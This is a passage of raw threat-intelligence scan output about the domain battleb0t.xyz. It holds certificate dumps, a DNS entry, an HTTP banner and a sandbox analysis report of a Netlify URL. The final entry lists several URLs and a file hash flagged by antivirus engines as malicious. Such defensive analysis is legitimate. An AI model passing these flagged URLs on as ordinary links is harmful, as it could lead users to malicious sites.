\/2{left:50%}.-bottom-4{bottom:-1rem}.resize{resize:both}.text-center{text-align:center}.text-black-dark{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#999;color:rgba(153,153,153,var(--text-opacity))}.text-red-error{--text-opacity:1;color:#bd2426;color:rgba(189,36,38,var(--text-opacity))}.text-green-success{--text-opacity:1;color:#9bca3e;color:rgba(155,202,62,var(--text-opacity))}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.w-12{width:3rem}.w-240{width:60rem}.w-1\/2{width:50%}.w-1\/3{width:33.333333%}.w-full{width:100%}.transition{-webkit-transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform,-webkit-transform}body,html{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity));-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-size:16px}*,body,html{margin:0;padding:0}*{box-sizing:border-box}a{--text-opacity:1;color:#2f7bbf;color:rgba(47,123,191,var(--text-opacity));text-decoration:none;-webkit-transition-property:all;transition-property:all;-webkit-transition-duration:.15s;transition-duration:.15s;-webkit-transition-timing-function:cubic-bezier(0,0,.2,1);transition-timing-function:cubic-bezier(0,0,.2,1)}a:hover{--text-opacity:1;color:#f68b1f;color:rgba(246,139,31,var(--text-opacity))}img{display:block;width:100%;height:auto}#what-happened-section p{font-size:15px;line-height:1.5}strong{font-weight:600}.bg-gradient-gray{background-image:-webkit-linear-gradient(top,#dedede,#ebebeb 3%,#ebebeb 97%,#dedede)}.cf-error-source:after{position:absolute;--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity));width:2.5rem;height:2.5rem;--transform-translate-x:0;--transform-translate-y:0;--transform-rotate:0;--transform-skew-x:0;--transform-skew-y:0;--transform-scale-x:1;--transform-scale-y:1;-webkit-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));-ms-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));--transform-rotate:45deg;content:"";bottom:-1.75rem;left:50%;margin-left:-1.25rem;box-shadow:0 0 4px 4px #dedede}@media screen and (max-width:720px){.cf-error-source:after{display:none}}.cf-icon-browser{background-image:url(/cdn-cgi/images/cf-icon-browser.png)}.cf-icon-cloud{background-image:url(/cdn-cgi/images/cf-icon-cloud.png)}.cf-icon-server{background-image:url(/cdn-cgi/images/cf-icon-server.png)}.cf-icon-ok{background-image:url(/cdn-cgi/images/cf-icon-ok.png)}.cf-icon-error{background-image:url(/cdn-cgi/images/cf-icon-error.png)}#cf-wrapper .feedback-hidden{display:none}#cf-wrapper .feedback-success{min-height:33px;line-height:33px}#cf-wrapper .cf-button{color:#0051c3;font-size:13px;border-color:#0045a6;-webkit-transition-timing-function:ease;transition-timing-function:ease;-webkit-transition-duration:.2s;transition-duration:.2s;-webkit-transition-property:background-color,border-color,color;transition-property:background-color,border-color,color}#cf-wrapper .cf-button:hover{color:#fff;background-color:#003681}.cf-error-footer .hidden{display:none}.cf-error-footer .cf-footer-ip-reveal-btn{-webkit-appearance:button;-moz-appearance:button;appearance:button;text-decoration:none;background:none;color:inherit;border:none;padding:0;font:inherit;cursor:pointer;color:#0051c3;-webkit-transition:color .15s ease;transition:color .15s ease}.cf-error-footer .cf-footer-ip-reveal-btn:hover{color:#ee730a}.code-label{background-color:#d9d9d9;color:#313131;font-weight:500;border-radius:1.25rem;font-size:.75rem;line-height:4.5rem;padding:.25rem .5rem;height:4.5rem;white-space:nowrap;vertical-align:middle}@media (max-width:639px){.sm\:block{display:block}.sm\:hidden{display:none}.sm\:mb-1{margin-bottom:.25rem}.sm\:mb-2{margin-bottom:.5rem}.sm\:py-4{padding-top:1rem;padding-bottom:1rem}.sm\:px-8{padding-left:2rem;padding-right:2rem}.sm\:text-left{text-align:left}}@media (max-width:720px){.md\:border-gray-400{--border-opacity:1;border-color:#dedede;border-color:rgba(222,222,222,var(--border-opacity))}.md\:border-solid{border-style:solid}.md\:border-0{border-width:0}.md\:border-b{border-bottom-width:1px}.md\:block{display:block}.md\:inline-block{display:inline-block}.md\:hidden{display:none}.md\:float-none{float:none}.md\:text-3xl{font-size:1.875rem}.md\:m-0{margin:0}.md\:mt-0{margin-top:0}.md\:mb-2{margin-bottom:.5rem}.md\:p-0{padding:0}.md\:py-8{padding-top:2rem;padding-bottom:2rem}.md\:px-8{padding-left:2rem;padding-right:2rem}.md\:pr-0{padding-right:0}.md\:pb-10{padding-bottom:2.5rem}.md\:top-0{top:0}.md\:right-0{right:0}.md\:left-auto{left:auto}.md\:text-left{text-align:left}.md\:w-full{width:100%}}@media (max-width:1023px){.lg\:text-sm{font-size:.875rem}.lg\:text-2xl{font-size:1.5rem}.lg\:text-4xl{font-size:2.25rem}.lg\:leading-relaxed{line-height:1.625}.lg\:px-8{padding-left:2rem;padding-right:2rem}.lg\:pt-6{padding-top:1.5rem}.lg\:w-full{width:100%}}
| http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 02:47:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:02:53.639 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:28:F1:70:B2:E6:F5:A1:9C:C3:2A:B9:98:
B7:CA:DE:46:06:8A:0D:FD:5D:51:62:6A:9E:AF:A7:18:
F8:56:D1:B0:02:20:21:A4:D3:7B:9B:94:A5:33:57:25:
EA:F9:E9:6B:7D:DB:3E:9B:70:AC:99:47:BB:60:A1:D8:
D4:9F:E0:9F:F4:44
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Feb 24 04:02:53.699 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3D:E9:FF:70:A3:4B:24:45:DE:32:CD:C1:
EB:D6:68:50:E8:90:39:17:70:65:2F:C3:8E:27:EF:8F:
0A:2C:12:42:02:20:63:BD:B7:88:53:11:AE:74:C0:8C:
3E:DD:9A:2F:D6:E5:34:A4:8C:A2:AB:43:8C:64:7E:9B:
D2:8E:90:08:CE:60
Signature Algorithm: sha256WithRSAEncryption
7e:31:5b:b5:c6:0c:16:27:0b:f5:1a:b3:80:a7:ef:5e:5f:1b:
87:38:b7:8a:be:5c:4b:2a:3f:28:2b:4f:87:5f:c2:b4:d3:b7:
be:f8:28:f5:15:c7:b3:3f:3d:40:b4:03:a4:95:06:01:1a:58:
1f:75:36:4b:ec:65:5a:e0:fd:b0:bf:41:e3:ff:57:4e:dd:05:
47:2c:e5:74:c8:5a:58:19:d6:53:61:f6:8d:0e:19:29:5d:dd:
b2:13:e8:c5:4c:7e:68:dc:f2:b4:05:5a:13:8e:d2:2e:4e:5e:
81:10:a5:86:8f:30:30:f7:61:4a:6f:5c:17:0d:a4:ef:13:02:
05:48:b0:18:ac:9c:df:24:70:12:e3:44:ac:31:54:f5:b6:92:
f4:ec:b6:e7:16:93:23:c7:b8:7e:51:5c:f7:05:33:1c:0e:7a:
b3:3d:ed:21:03:d2:bc:a5:bf:10:81:1f:4c:79:d4:3a:73:b9:
93:9f:57:8b:98:ea:3e:74:39:70:99:3d:3a:c0:f2:4d:e1:55:
ed:dc:49:4e:a6:39:a5:82:ea:2d:6e:e9:17:c6:72:75:ec:10:
72:d0:c9:3e:b9:30:69:bc:2f:70:06:3c:ba:31:b6:c1:0c:45:
e6:92:88:78:56:3a:d4:0c:d2:32:b8:49:37:f3:c4:6d:15:69:
54:99:0a:d9
| battleb0t.xyz |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:cb:71:f4:b8:7c:a4:30:09:1b:13:75:c6:c3:49:
0a:5a:97:35:c2:e3:b5:90:5b:a3:b9:e0:c8:a4:e3:
37:7a:a6:7e:1b:38:a5:5a:63:ab:b5:eb:db:f5:ce:
46:28:9a:bb:61:30:d2:f6:61:59:c2:0e:37:b3:85:
32:eb:67:93:5c:a2:8a:68:ae:c7:6a:b0:d0:9f:fc:
8d:d5:3b:0a:5d:17:21:49:98:a5:cc:cd:89:42:87:
4d:54:69:c0:91:34:ff:12:c3:4c:10:fb:89:47:3a:
b3:b5:ed:cc:06:52:eb:16:7a:af:b4:c5:22:00:43:
aa:8d:8b:68:61:04:b5:6e:86:7d:6f:23:6e:79:15:
3b:96:1c:92:ea:d1:76:1a:98:eb:67:69:53:a7:00:
db:63:83:56:0b:fc:db:8c:00:6a:64:27:99:81:0c:
e0:c2:14:78:8e:45:d2:05:23:4b:2e:a1:d6:90:83:
3d:eb:f6:16:04:b9:30:78:89:df:df:c5:c0:a5:c5:
60:dc:2c:82:50:e1:50:fc:88:d4:46:2d:16:9d:dd:
14:56:c3:31:55:0c:b7:cc:40:45:d8:f9:22:11:f9:
ed:60:df:5c:2f:a8:5f:17:ac:ff:7d:8a:1e:77:a6:
e8:15:cb:e0:33:32:29:69:ca:42:d7:15:49:3f:d9:
68:31:ef:59:a1:4e:f5:94:c3:75:47:24:20:25:4f:
22:0f:35:ad:2a:db:20:f0:5d:b9:c7:a2:17:d1:f3:
52:80:77:94:64:66:0d:72:a2:bf:aa:b0:5e:b6:d9:
af:81:4d:54:fa:3e:6b:7d:a8:7b:0d:08:23:70:3b:
37:ad:2b:75:bf:91:06:70:7f:c1:79:93:83:08:8c:
9a:bf:f2:64:ef:2f:39:42:b9:84:35:4b:b0:83:66:
5e:d7:c5:a7:06:f4:b4:89:e9:41:d1:09:1f:c3:66:
18:da:ea:4b:2f:9a:1a:d0:a2:05:8c:af:7f:ec:ae:
0f:17:00:fd:78:c7:64:b6:db:0c:73:e7:03:66:b3:
9e:9f:74:ea:0a:b7:ba:41:3e:89:fa:49:d9:69:26:
3c:0e:bc:77:f5:9f:cd:1d:0b:77:59:ba:57:e5:96:
24:24:9a:52:56:4e:63:31:d7:70:db:dc:4b:70:cb:
90:cd:e2:20:14:b5:fa:25:1b:2d:3b:39:de:26:c5:
3e:2d:95:63:5f:d6:2a:ba:87:f1:7a:9d:cc:8d:4d:
e8:02:34:63:08:c3:8a:65:36:2f:3d:9b:90:77:71:
2a:cc:26:26:c5:ad:9e:d8:4e:fb:7a:b2:ec:5f:c7:
b5:9a:b3:86:c9:5c:88:b7:8c:c8:3d:30:64:42:7f:
87:9a:b5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:49:55.813 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:86:06:13:D6:59:74:98:67:AB:1E:5E:
35:81:72:04:C0:6A:1F:FC:7B:00:6F:B8:03:F1:BE:1B:
95:AB:B8:28:27:02:21:00:BC:93:E5:D5:C0:AB:C3:D9:
F0:70:98:2F:0B:66:FF:CE:EB:B1:93:B5:AF:E3:EC:E5:
24:C0:E0:01:07:FE:3F:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 27 18:49:55.791 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:EE:AA:37:8F:C9:30:00:92:D7:56:A4:
B6:CE:F3:F5:CF:29:81:16:83:11:DE:9E:A3:05:67:53:
91:6D:18:E7:A8:02:21:00:D8:7E:2B:BA:15:47:72:19:
DF:D8:EF:24:B0:25:79:A1:48:F8:3A:2F:C8:FB:0A:50:
3F:7F:81:1E:4F:CF:9B:26
Signature Algorithm: sha256WithRSAEncryption
54:17:5d:50:fa:47:51:89:f1:3d:5a:36:e8:d7:6e:d8:ae:85:
fe:d5:2e:dc:14:36:b2:f3:63:e0:57:da:ee:7f:c4:31:c7:24:
a6:e1:02:c4:6d:d7:20:80:18:28:5b:5e:4a:05:31:14:72:9e:
66:88:fd:41:57:c0:d0:ff:22:13:fd:7e:a3:d9:75:17:b4:67:
19:9a:e9:16:5e:44:4f:78:33:3a:4e:54:5f:6f:68:3b:1c:af:
d6:db:9b:bd:2a:b2:ea:76:7b:55:8a:a5:42:70:bd:16:d6:9e:
36:d7:56:22:2c:f3:d5:18:19:3e:f8:18:e5:da:a9:4e:03:a9:
13:d9:fb:8a:01:6e:70:f3:d9:fb:a9:8f:9a:38:b9:d7:89:2c:
9a:59:0a:bf:e9:71:d6:1c:2b:eb:93:fd:5b:0d:32:8d:ce:21:
6b:4e:a0:7b:68:bb:1b:49:02:64:07:cd:71:b7:fa:23:e8:c5:
12:86:a7:7c:6b:b8:cf:88:07:9a:b1:b0:e7:e8:80:0a:54:1c:
15:61:1e:50:90:fa:7e:93:82:0d:40:bf:16:d5:1e:1e:93:9f:
58:6f:56:5d:6c:49:c2:36:9e:81:7f:0e:32:d4:68:dd:6c:03:
64:48:28:01:66:a7:85:1f:9a:be:92:2f:5f:75:fe:d1:ff:94:
e2:b4:07:7b
|
| 2023-05-12 02:53:42 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8d-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 7C6A:7C80:2850A39:3919A91:645D8DCD
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 1827
X-Served-By: cache-chi-kigq8000031-CHI
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1683854577.750981,VS0,VE4
Vary: Accept-Encoding
X-Fastly-Request-ID: 01d5273de282686844c6b1cd964008c7007600d9
| 185.199.109.153 |
| 2023-05-12 02:58:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.148.97.127', u'96.6.31.32'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/system/_title_screen.ks', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bb8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "CommunicationManager_Mutex"\n "IsoScope_bb8_ConnHashTable<3000>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_bb8_IE_EarlyTabStart_0x87c_Mutex"\n "IsoScope_bb8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_bb8_IESQMMUTEX_0_303"\n "SmartScreen_ClientId_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3000"\n "Local\\VERMGMTBlockListFileMutex"\n "SmartScreen_AppRepSettings_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"68.142.107.4:80"\n "34.148.97.127:443"\n "96.6.31.32:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_196E02E2-21A6-11ED-9D74-08002763CA91_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003000]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00000276]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003000]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003000]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003000]\n "RecoveryStore._48C636BB-21A4-11ED-9D74-08002763CA91_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "76P3A3ZI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\76P3A3ZI.txt]- [targetUID: 00000000-00003000]\n "~DFB1C121D813060596.TMP" has type "data"- Location: [%TEMP%\\~DFB1C121D813060596.TMP]- [targetUID: 00000000-00003000]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00000276]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003000]\n "8864D121A6EBD5E6D0EFEDAB49B51A90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\8864D121A6EBD5E6D0EFEDAB49B51A90]- [targetUID: 00000000-00000276]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003000]\n "50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF]- [targetUID: 00000000-00000276]\n "~DF92A4208FF8524FE3.TMP" has type "data"- Location: [%TEMP%\\~DF92A4208FF8524FE3.TMP]- [targetUID: 00000000-00003000]\n "B126BF247C927A243E186240F06A7849" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B126BF247C927A243E186240F06A7849]- [targetUID: 00000000-00000276]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /data/scenario/system/_title_screen.ks HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: 62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.148.97.127]\n\n "HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:b47e5e27-bf85-45ba-a97c-0377ce0e5779\nX-Response-Cache-Status: True\nExpires: Mon, 22 Aug 2022 00:43:49 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Mon, 22 Aug 2022 00:43:49 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"- [Source: SSL_96.6.31.32]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/system/_title_screen.ks"- [Source: Input]\n Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app"- [Source: Input]\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"- [Source: SSL_96.6.31.32]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.148.97.127": ...\n\n URL: https://apex-university.netlify.app/ (AV positives: 20/89 scanned on 08/22/2022 00:06:28)\n URL: https://www.toprankedtechgadgetsnow.com/p/tf?affid=8929&provider=Affiliati&click_id=f116ae132e8d4f80a8607bf83fd87f9d&c1=&c2=506642568&c3=&showLoading=1&xyz=30.0 (AV positives: 1/88 scanned on 08/22/2022 00:05:22)\n URL: https://grand-kataifi-0d3694.netlify.app/ (AV positives: 11/88 scanned on 08/21/2022 23:01:29)\n URL: https://www.toprankedtechgadgetsnow.com/p/sw?affid=8929&provider=Affiliati&click_id=ad04bd2d55f7442084fd876552cffdde&c1=&c2=506623183&c3=&xyz=30.0 (AV positives: 1/88 scanned on 08/21/2022 22:58:56)\n URL: https://endearing-dusk-d5d9a0.netlify.app/ (AV positives: 11/88 scanned on 08/21/2022 22:07:36)\n File SHA256: ed519561b155ef7b685ef981c466638407317d9d8eb0f5236a3a48f0575f6545 (AV positives: 27/75 scanned on 08/16/2022 18:17:19)\n 